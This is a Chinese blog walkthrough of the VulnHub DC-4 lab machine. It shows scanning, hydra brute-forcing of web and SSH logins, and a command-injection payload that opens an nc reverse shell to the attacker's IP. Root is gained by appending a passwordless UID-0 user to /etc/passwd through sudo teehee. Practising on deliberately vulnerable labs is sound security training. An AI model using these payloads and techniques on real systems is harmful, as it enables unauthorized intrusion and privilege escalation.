【vulnhub】DC4

博客主页：开心星人的博客主页
系列专栏：vulnhub
欢迎关注点赞收藏⭐️留言
首发时间：2022年7月1日
作者水平很有限，如果发现错误，还望告知，感谢！

靶机默认为桥接模式

kali设置为桥接模式

主机发现
netdiscover

靶机ip为192.168.0.151

namp -p- -A 192.168.0.151

ssh服务和http服务

访问80端口

dirb常规目录扫描
dirb http://192.168.0.151

两个目录403

whatweb http://192.168.0.151

这个页面没法用cwel爬取字典

上弱口令
上hydra，用john自带的字典 /usr/share/john/password.lst

已知用户名为admin
hydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /



可以执行命令，但是命令写死了
抓包看一下

确实是的

反弹个shell
radio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run

nc -lvvp 233
放包

python -c 'import pty;pty.spawn("/bin/bash")'
获得一个交互式的shell

ls /home
有三个用户

一个一个翻一下
只有jim能看


有密码

继续翻jim下的其他文件

没有权限查看mbox

现在看ssh服务

然后将三个用户保存为user.txt。
我直接把密码备份文件手动复制到了kali攻击机里
用hydra爆破ssh服务
hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60

ssh爆破出来一个用户
jim:jibril04
登录看一下
ssh [email protected]

登录成功
可以查看mbox

这是发邮件，root给jim发的邮件，但是没有邮件内容
在/var/jim里面找到 。（这个/var/mail是默认自带的文件夹，可能就是用来保存邮件的）

得到了charles的密码
登录看看


什么都没发现

现在只能考虑提权了
给了我们charles这个用户，那就用这个用户来提权

test.sh具有suid权限，但是我不知道它什么时候会运行，没见过它运行的样子。

第一考虑用用ping提权，但是发现好像不太行

用sudo
sudo -l


echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
构造一个用户具有root权限，写入/etc/passwd